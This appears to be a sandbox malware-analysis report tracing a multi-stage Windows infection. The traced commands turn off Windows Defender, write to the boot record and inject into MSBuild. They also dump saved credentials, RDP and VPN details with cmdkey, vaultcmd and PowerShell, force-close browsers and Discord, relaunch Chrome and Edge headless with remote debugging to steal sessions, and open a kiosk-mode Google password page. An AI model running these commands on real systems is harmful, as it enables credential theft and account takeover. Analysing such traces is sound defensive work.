C:\Users\Admin\AppData\Local\a0aXHjDn2Szx.exe"C:\Users\Admin\AppData\Local\a0aXHjDn2Szx.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416010101\68e98395dc.exe"C:\Users\Admin\AppData\Local\Temp\10416010101\68e98395dc.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {d3b6e210-de15-45d1-947f-b65edcde7a93} -parentPid 6028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6028" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {0b2a0154-283e-43f1-b016-212f0bdd306d} -parentPid 6028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3904 -prefsLen 25164 -prefMapHandle 3908 -prefMapSize 270279 -jsInitHandle 3912 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3920 -initialChannelId {875db47b-3915-4210-bdad-c157ab2700f1} -parentPid 6028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4068 -prefsLen 27276 -prefMapHandle 4072 -prefMapSize 270279 -ipcHandle 4160 -initialChannelId {de47a657-55c4-48df-a60c-9599bc78411c} -parentPid 6028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6028" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3164 -prefsLen 34775 -prefMapHandle 3252 -prefMapSize 270279 -jsInitHandle 3256 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3132 -initialChannelId {cc7544a4-8105-409c-a237-08b0be677299} -parentPid 6028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 1384 -prefsLen 34959 -prefMapHandle 5024 -prefMapSize 270279 -ipcHandle 5184 -initialChannelId {3555c54f-d456-4dc5-9301-e4964940f1ce} -parentPid 6028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5328 -prefsLen 32952 -prefMapHandle 5332 -prefMapSize 270279 -jsInitHandle 5336 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5300 -initialChannelId {ce4efd19-0023-4297-b001-a31cf77fdfc8} -parentPid 6028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5536 -prefsLen 32952 -prefMapHandle 5540 -prefMapSize 270279 -jsInitHandle 5544 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5332 -initialChannelId {b1e1d2f9-50d6-41ce-9ceb-2a3f4c7eb1ad} -parentPid 6028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5712 -prefsLen 32952 -prefMapHandle 5716 -prefMapSize 270279 -jsInitHandle 5720 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5732 -initialChannelId {2b4835a4-c54a-4213-9486-28fe05c9f0c8} -parentPid 6028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
- Checks processor information in registry
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416020101\562b2031f5.exe"C:\Users\Admin\AppData\Local\Temp\10416020101\562b2031f5.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10416030101\a55ffb47db.exe"C:\Users\Admin\AppData\Local\Temp\10416030101\a55ffb47db.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416040101\fddc107e14.exe"C:\Users\Admin\AppData\Local\Temp\10416040101\fddc107e14.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10416050101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10416050101\h8NlU62.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416060101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10416060101\XOPPRUc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416070101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10416070101\7IIl2eE.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416080101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10416080101\captcha.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2370654345.txt\""4⤵
- NTFS ADS
-
-
C:\Windows\system32\net.exe"net" statistics workstation4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation5⤵
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list4⤵
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list5⤵
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\certutil.exe"certutil" -store My4⤵
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "4⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.744⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM Discord.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordCanary.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordPTB.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordDevelopment.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"4⤵
- Enumerates processes with tasklist
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=40324 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffeb71dcf8,0x7fffeb71dd04,0x7fffeb71dd105⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2408,i,3293528870780540872,13967733625792399128,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2400 /prefetch:25⤵
- Modifies registry class
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2720,i,3293528870780540872,13967733625792399128,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2608 /prefetch:35⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2768,i,3293528870780540872,13967733625792399128,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2760 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=40324 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2932,i,3293528870780540872,13967733625792399128,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2928 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=40324 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,3293528870780540872,13967733625792399128,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3156 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=40324 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3940,i,3293528870780540872,13967733625792399128,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3936 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4440,i,3293528870780540872,13967733625792399128,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4436 /prefetch:85⤵
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"4⤵
- Enumerates processes with tasklist
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=47724 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x24c,0x7fffeb6ff208,0x7fffeb6ff214,0x7fffeb6ff2205⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2832,i,13528338284424512995,7380733963777317563,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2824 /prefetch:25⤵
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2992,i,13528338284424512995,7380733963777317563,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2988 /prefetch:35⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2772,i,13528338284424512995,7380733963777317563,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2700 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=47724 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3332,i,13528338284424512995,7380733963777317563,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3328 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=47724 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3544,i,13528338284424512995,7380733963777317563,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3296 /prefetch:15⤵
- Uses browser remote debugging
-
-
